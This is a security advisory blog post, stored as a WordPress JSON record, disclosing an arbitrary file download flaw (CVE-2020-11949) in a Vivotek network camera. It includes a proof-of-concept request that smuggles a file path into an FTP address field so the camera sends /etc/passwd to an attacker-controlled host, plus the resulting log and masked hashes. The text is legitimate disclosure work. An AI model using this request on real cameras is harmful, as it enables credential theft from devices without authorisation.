{"id":5164,"date":"2020-06-25T09:23:27","date_gmt":"2020-06-25T08:23:27","guid":{"rendered":"https:\/\/www.dionach.com\/?p=5164"},"modified":"2026-03-26T10:54:55","modified_gmt":"2026-03-26T10:54:55","slug":"multiple-vulnerabilities-in-vivotek-camera","status":"publish","type":"post","link":"https:\/\/dionach.development-visionsharp.co.uk\/en-us\/multiple-vulnerabilities-in-vivotek-camera\/","title":{"rendered":"Multiple Vulnerabilities in Vivotek Camera"},"content":{"rendered":"\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\tAuthor:<\/strong> Mike Manzotti – Senior Consultant\r\n\r\nIn a recent security engagement Vivotek Camera IT9388-HT (firmware version: 0100p) was found to be vulnerable to arbitrary file download (CVE-2020-11949) and remote command execution (CVE-2020-11950). Vivotek Camera IT9388-HT is a weatherproof network camera for surveillance and CCTV networks which comes with motion, tamper detection and infrared illumination. Under the hood, it’s a Linux system based on the ARM architecture and the configuration settings are made via a web interface, which is pretty common for an IoT (Internet of things) device.\r\n\r\n\"Multiple\r\n

Arbitrary File Download: CVE-2020-11949<\/h2>\r\nThe Vivotek camera allows an authenticated user to schedule tasks which can be triggered at a certain time or when an event happens via the motion or tamper detection controls. The scheduled tasks can be created via the web interface or by uploading a script file. The web interface allows the user to specify a system log file and an external FTP server, and then permits the user to test the configuration by sending a test file to the specified FTP server. However, a malicious user can force the camera to send any local file to a malicious user’s FTP server.\r\n\r\nAs a proof of concept example, the following request forces the camera to send the “\/etc\/passwd” file to the attacker’s FTP server:\r\n
POST http:\/\/<CAMERA_IP>\/cgi-bin\/admin\/testserver.cgi\r\ntype=ftp&address=<ATTACKER_IP>+.+\/etc\/passwd+#<\/strong>&username=anonymous&port=21&sslmode=&passive=1&url=&location=ls&senderemail=&recipientemail=&workgroup=&groupidx=0<\/pre>\r\nThe following output shows the file was successfully received by the attacker’s FTP server:\r\n
$ python -m pyftpdlib -p 21 -w\r\n[I 2020-02-18 22:24:07] [MASKED]:58474-[] FTP session opened (connect)\r\n[I 2020-02-18 22:24:07] [MASKED]::58474-[anonymous] USER 'anonymous' logged in.\r\n[I 2020-02-18 22:24:07] [MASKED]::58474-[anonymous] CWD \/root\/Scans 250\r\n[I 2020-02-18 22:24:07] [MASKED]::58474-[anonymous] STOR \/root\/Scans\/passwd completed=1<\/strong> bytes=234 seconds=0.012\r\n[I 2020-02-18 22:24:07] [MASKED]:14:58474-[anonymous] FTP session closed (disconnect).\r\n^C[I 2020-02-18 22:24:10] received interrupt signal\r\n[I 2020-02-18 22:24:10] >>> shutting down FTP server, 1 socket(s), pid=452478 <<<<\/pre>\r\nWith this vulnerability an attacker could gain access to the “\/etc\/passwd” file of the camera containing password hashes:\r\n
$ cat passwd\r\nroot:$1$iC$To**********************************6<\/strong>:\/mnt\/ramdisk:\/bin\/sh\r\ntmis:x:9999:9999:Linux User,,,:\/home\/tmis:\/bin\/sh\r\nviewer:$1$kD$***********************************7<\/strong>:\/tmp:\/bin\/bash<\/pre>\r\nLimitations <\/u>\r\n\r\nAn attacker would need to reach the Vivotek camera’s web interface and have authenticated access.\r\n\r\nBelow is proof of concept video showing the exploitation process:\r\n\r\n